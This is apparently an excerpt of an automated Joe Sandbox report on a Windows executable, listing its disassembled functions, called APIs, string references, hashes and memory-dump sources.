Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: 64B0927268020C33EA202942AC03F263A0D87D0B64E640021BA1C1D1A5A9B2A961808D

Function 004089CF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00407E6C,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 004089D2

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: c635e92dd265372a0ac16abef4fb17a803da047c5b1ded40a1a00e6431af769c
Instruction ID: 8764dd92a4aeea9fc6a797bc89121622734c807ffe49c2e46d1e29d47898f422
Opcode Fuzzy Hash: c635e92dd265372a0ac16abef4fb17a803da047c5b1ded40a1a00e6431af769c
Instruction Fuzzy Hash: 45B011303A000A8B8F202B30CE088283A20EB2230A30082B0A02AC80A0CB23C023AA00

Function 00419806 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0040D5D6,0042A644,00000000,?,00000006,?,00000800), ref: 0041980A

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: d3f7c641652e8f08ac12cbb3d58c3bebf67a7f5dc113771634cfd816c524747e
Instruction ID: 175a8f5435bd407339ccdaf5ebd2187c03bf393c5a072438874265726e840e79
Opcode Fuzzy Hash: d3f7c641652e8f08ac12cbb3d58c3bebf67a7f5dc113771634cfd816c524747e
Instruction Fuzzy Hash: 98A0123039400647CA100F34CD0A82575505760B02F0086307006C00A0CB304430A505

Non-executed Functions

Function 0040DB4F Relevance: 52.8, APIs: 27, Strings: 3, Instructions: 291windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32 ref: 0040DBC9
DestroyIcon.USER32(00000000), ref: 0040DBD4
EndDialog.USER32 ref: 0040DBDC

Strings

REPLACEFILEDLG, xrefs: 0040DB67
%s %s %s, xrefs: 0040DCF4, 0040DE15
%s %s, xrefs: 0040DD6D, 0040DE74

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: DestroyDialogIconItemMessageSend
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 3309745630-1840816070
Opcode ID: 749a3dea07884193612789b54596e642b0e78fedcf72ff924081d4045fee8b6b
Instruction ID: 827be73114fe76e2aba02d4ea3136fc84fceb4fba69d84f61c2c98601b35f17e
Opcode Fuzzy Hash: 749a3dea07884193612789b54596e642b0e78fedcf72ff924081d4045fee8b6b
Instruction Fuzzy Hash: 52A16471A4021CBBEB21EFE0CC85FEB777CEB04704F400466BA05E61D1D679AE5A8B65

Function 00406733 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 274fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00406738
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000001,?,00406B02,00000000,?,-000065E8,00407C07,?), ref: 004067A7
CloseHandle.KERNEL32(00000000), ref: 004067B7
_wcslen.LIBCMT ref: 004067EF
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000001,?,00406B02,00000000,?,-000065E8,00407C07,?,?,?,?,?,?), ref: 0040685B
_wcscpy.LIBCMT ref: 00406875
_wcslen.LIBCMT ref: 00406881
_wcscpy.LIBCMT ref: 004068C9

Part of subcall function 004064B1: GetCurrentProcess.KERNEL32(00000020,?), ref: 004064C0
Part of subcall function 004064B1: OpenProcessToken.ADVAPI32(00000000), ref: 004064C7
Part of subcall function 004064B1: LookupPrivilegeValueW.ADVAPI32 ref: 004064E7
Part of subcall function 004064B1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 004064FC
Part of subcall function 004064B1: GetLastError.KERNEL32 ref: 00406506
Part of subcall function 004064B1: CloseHandle.KERNEL32(?), ref: 00406515

_wcscpy.LIBCMT ref: 004068ED
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00406997
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 004069D6
CloseHandle.KERNEL32(00000000), ref: 004069E1
GetLastError.KERNEL32 ref: 004069F3
RemoveDirectoryW.KERNEL32(00000000), ref: 00406A28
DeleteFileW.KERNEL32(00000000), ref: 00406A30

Part of subcall function 0041A086: __lock.LIBCMT ref: 0041A0A4
Part of subcall function 0041A086: ___sbh_find_block.LIBCMT ref: 0041A0AF
Part of subcall function 0041A086: ___sbh_free_block.LIBCMT ref: 0041A0BE
Part of subcall function 0041A086: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
Part of subcall function 0041A086: GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 0040675A
UNC\, xrefs: 0040682C
\??\, xrefs: 0040680A
SeRestorePrivilege, xrefs: 00406750

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast_wcscpy$DirectoryProcessToken_wcslen$AdjustControlCurrentDeleteDeviceFreeH_prologHeapLookupOpenPrivilegePrivilegesRemoveValue___sbh_find_block___sbh_free_block__lock
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3709686777-3508440684
Opcode ID: c258219808b2eda87518a90a5aa7d19e8d2121a749bddc8e958efd46b88a6f3c
Instruction ID: facf686eb702fd5a5c240de56c53d3d43b4e883ba41454b7b8032450fdd1dc0c
Opcode Fuzzy Hash: c258219808b2eda87518a90a5aa7d19e8d2121a749bddc8e958efd46b88a6f3c
Instruction Fuzzy Hash: 70A1B471600214AFDB21EF64CC45BEA77A8EF04304F00457FF95AE7291D778AAA4CB69

Function 004102EA Relevance: 24.2, APIs: 16, Instructions: 225COMMON

Download Yara Rule

APIs

__byteswap_ulong.LIBCMT ref: 0041031C
__byteswap_ulong.LIBCMT ref: 0041032F
__byteswap_ulong.LIBCMT ref: 00410342
__byteswap_ulong.LIBCMT ref: 00410355
__byteswap_ulong.LIBCMT ref: 00410368
__byteswap_ulong.LIBCMT ref: 0041037B
__byteswap_ulong.LIBCMT ref: 0041038E
__byteswap_ulong.LIBCMT ref: 004103A1
__byteswap_ulong.LIBCMT ref: 004103B4
__byteswap_ulong.LIBCMT ref: 004103C7
__byteswap_ulong.LIBCMT ref: 004103DA
__byteswap_ulong.LIBCMT ref: 004103ED
__byteswap_ulong.LIBCMT ref: 00410402
__byteswap_ulong.LIBCMT ref: 00410415
__byteswap_ulong.LIBCMT ref: 00410428
__byteswap_ulong.LIBCMT ref: 0041043B

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: __byteswap_ulong
String ID:
API String ID: 2309504477-0
Opcode ID: 6e684b15e74e9267a8b2bb02a5393d20d4bf3e570c3c201c546b3778de1fd3cf
Instruction ID: f2fc5d2990e61c7ba140b040ae62fd3db552cd59a2b01400d84158058e3a83a1
Opcode Fuzzy Hash: 6e684b15e74e9267a8b2bb02a5393d20d4bf3e570c3c201c546b3778de1fd3cf
Instruction Fuzzy Hash: F991E675A007048FCB64DF5AC881A9AB7F1FF48308F0445AEE55AE7762D734E9948F48

Function 00419A1E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 184comCOMMON

Download Yara Rule

APIs

Part of subcall function 004199F3: GetDC.USER32 ref: 004199F7
Part of subcall function 004199F3: GetDeviceCaps.GDI32 ref: 00419A02
Part of subcall function 004199F3: ReleaseDC.USER32(00000000,00000000), ref: 00419A0D

GetObjectW.GDI32(00000200,00000018,?), ref: 00419A4B
CoCreateInstance.OLE32(0042B198,00000000,00000001,0042B090,?,00000000,?), ref: 00419A7B

Part of subcall function 00419889: GetDC.USER32 ref: 00419895
Part of subcall function 00419889: CreateCompatibleDC.GDI32(00000000), ref: 004198A5
Part of subcall function 00419889: CreateCompatibleDC.GDI32(?), ref: 004198AC
Part of subcall function 00419889: GetObjectW.GDI32(?,00000018,?), ref: 004198BA
Part of subcall function 00419889: CreateCompatibleBitmap.GDI32 ref: 004198DC
Part of subcall function 00419889: SelectObject.GDI32 ref: 004198EF
Part of subcall function 00419889: SelectObject.GDI32 ref: 004198FA
Part of subcall function 00419889: StretchBlt.GDI32 ref: 00419918
Part of subcall function 00419889: SelectObject.GDI32 ref: 00419922
Part of subcall function 00419889: SelectObject.GDI32 ref: 0041992A
Part of subcall function 00419889: DeleteDC.GDI32 ref: 00419933
Part of subcall function 00419889: DeleteDC.GDI32 ref: 00419938
Part of subcall function 00419889: ReleaseDC.USER32(00000000,?), ref: 0041993E

Strings

(, xrefs: 00419B23

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Object$CreateSelect$Compatible$DeleteRelease$BitmapCapsDeviceInstanceStretch
String ID: (
API String ID: 189428636-3887548279
Opcode ID: 5944d7030503ee4e6fe2997628098f357063f2f40a147e5def9495c7f969f20f
Instruction ID: 3e8188f6aa3c40b75b3dc49b223c9d0ef22faecde0b71e70af5579e3dbcfa49d
Opcode Fuzzy Hash: 5944d7030503ee4e6fe2997628098f357063f2f40a147e5def9495c7f969f20f
Instruction Fuzzy Hash: 74611A75A00248AFDB00DFA5C898EDEBBB9FF89704B10845AF805EB250D775EE51CB64

Function 0041E29E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00423AFE
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B13
UnhandledExceptionFilter.KERNEL32(`D), ref: 00423B1E
GetCurrentProcess.KERNEL32(C0000409), ref: 00423B3A
TerminateProcess.KERNEL32(00000000), ref: 00423B41

Strings

`D, xrefs: 00423B19

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: `D
API String ID: 2579439406-1070873967
Opcode ID: 56c5a62fb2f7f6636291a6d14797e7b81fa4396f563e9201061004f269c01aac
Instruction ID: 1b8c75253f4a1fb67dcd03bf68bab86093f07bc06bf87ca9c985b91bf6324b44
Opcode Fuzzy Hash: 56c5a62fb2f7f6636291a6d14797e7b81fa4396f563e9201061004f269c01aac
Instruction Fuzzy Hash: 9321E3BCA00254EFD710DF26F8456543BB4FB1A314FA0457AE808833A1E7B5598ACF1E

Function 00402EE8 Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 544COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402EF1
_memcmp.LIBCMT ref: 00402FB9
_memcmp.LIBCMT ref: 00403293

Strings

@, xrefs: 00403460
CMT, xrefs: 00403516

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memcmp$H_prolog
String ID: @$CMT
API String ID: 212800410-3935043585
Opcode ID: d97cd48d0b0e423ee0d6d3143cc2d47fbaf3e39c7e3857e2484a5abac2696288
Instruction ID: 221805aced1652906711960687db6e07b3a85ef0f9aba0b4dcb536048f969393
Opcode Fuzzy Hash: d97cd48d0b0e423ee0d6d3143cc2d47fbaf3e39c7e3857e2484a5abac2696288
Instruction Fuzzy Hash: EE2216715006849EDB14DF24C885BEA3BE9EF14309F08047FEC4AAF2C6DB799589CB59

Function 004064B1 Relevance: 9.0, APIs: 6, Instructions: 42COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?), ref: 004064C0
OpenProcessToken.ADVAPI32(00000000), ref: 004064C7
LookupPrivilegeValueW.ADVAPI32 ref: 004064E7
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 004064FC
GetLastError.KERNEL32 ref: 00406506
CloseHandle.KERNEL32(?), ref: 00406515

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: ffeccf25956bfd93346b2d86616f67c4b85d78278941fcedc4f79907d0ffdda3
Instruction ID: 7d79c828538b3fb642843b72510981fbd1babca9237f7a15f2133ae5d16d8fd7
Opcode Fuzzy Hash: ffeccf25956bfd93346b2d86616f67c4b85d78278941fcedc4f79907d0ffdda3
Instruction Fuzzy Hash: 41011DB1600208BFDB109FA4DD89EAF7B7CEB04348F400075B902E2290D735CE65AA35

Function 0040FD6E Relevance: 9.0, Strings: 7, Instructions: 289COMMON

Download Yara Rule

Strings

\D, xrefs: 0040FF80
D, xrefs: 0041001B
XD, xrefs: 0040FF88
|D, xrefs: 0040FE6B
D, xrefs: 00410031
|D, xrefs: 004100A9
tD, xrefs: 0040FDD9

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID: XD$\D$tD$|D$|D$D$D
API String ID: 0-3078164799
Opcode ID: 0a6c8c69c1ecaacaf633ce98038707684b399f4dcbbf3a14a3df9b2591b2b270
Instruction ID: c1c274802df1f80b39ab265c9fcc8f5e649c081510268a3a8c2a2ffdf87823b1
Opcode Fuzzy Hash: 0a6c8c69c1ecaacaf633ce98038707684b399f4dcbbf3a14a3df9b2591b2b270
Instruction Fuzzy Hash: C4D14D72A0021ACFCF14CF58D484599B7B1FF8C318B2645ADED19AB245D731BA16CF94

Function 0040CE48 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0040CE6E
GetNumberFormatW.KERNEL32 ref: 0040CEBB

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 804a2e1f4122a07eb972676116a6fd6af5b1b2391d4556cd137941413f2e30aa
Instruction ID: 1ad5bc909b46eecd3268d0d2b882b2fb86b155acc70454faf37e79c6d8b7974a
Opcode Fuzzy Hash: 804a2e1f4122a07eb972676116a6fd6af5b1b2391d4556cd137941413f2e30aa
Instruction Fuzzy Hash: 10012C35600208AED721DFA4DC45FEBB7F8EF09714F508436FA08D71A1E37499598BA9

Function 004144E9 Relevance: 2.0, APIs: 1, Instructions: 478COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 004145C4

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _realloc
String ID:
API String ID: 1750794848-0
Opcode ID: abf57308087783fe3f7c53a136bf7068ebf91bec20350fc37c188db2c7bd9ce3
Instruction ID: 1410e91426f68443542650098e6ec7358f7ccad90b220b18a16291b855aa5060
Opcode Fuzzy Hash: abf57308087783fe3f7c53a136bf7068ebf91bec20350fc37c188db2c7bd9ce3
Instruction Fuzzy Hash: F302F7B1A00606ABCB1DCF24C5816F9B7E1FF85304F24852ED556CBA85D338E9E1CB89

Function 00413A86 Relevance: 1.8, APIs: 1, Instructions: 267COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00413B16

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 8f53a413168a7251628ccaf433f223e688d85f6291bdaad726b332497dcc1340
Instruction ID: 2727284570ec679b4ef5becb8128c94fba53aa7e36dcb66027d2e07aea80790f
Opcode Fuzzy Hash: 8f53a413168a7251628ccaf433f223e688d85f6291bdaad726b332497dcc1340
Instruction Fuzzy Hash: 8AA10172A00208EBDB05DF59C991BED73A4EB40305F20446FE946EB283DB7C9B858B59

Function 0040998E Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 004099B3

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 323b664bac6b029254f741a14eb1960b5593a766be610192fc34cae7ccbd568a
Instruction ID: 2ef5a1abfd90ec2e7d7cbb871068e56f39c89d3dc80b05f19f5fda3bbbfc1b6f
Opcode Fuzzy Hash: 323b664bac6b029254f741a14eb1960b5593a766be610192fc34cae7ccbd568a
Instruction Fuzzy Hash: D0F017B1A001088FCB28CF18EE926D9B3F0E744304F5042B9D615D33D0D6B49E85CF69

Function 0042308E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002304C), ref: 00423093

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 16af41f25cf85f3f3dba818ab06a542be2b62224a987b82d8de5140ae086c169
Instruction ID: e4e658e65f311e75d6524aafb7675053e075d5b15ccbdaca9fe0fb4715c3e542
Opcode Fuzzy Hash: 16af41f25cf85f3f3dba818ab06a542be2b62224a987b82d8de5140ae086c169
Instruction Fuzzy Hash: 2D9002603511109746105B706D0B71525A05B68A13BD54861A501C4059DA9C8225553A

Function 00404942 Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

gj, xrefs: 00404999

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

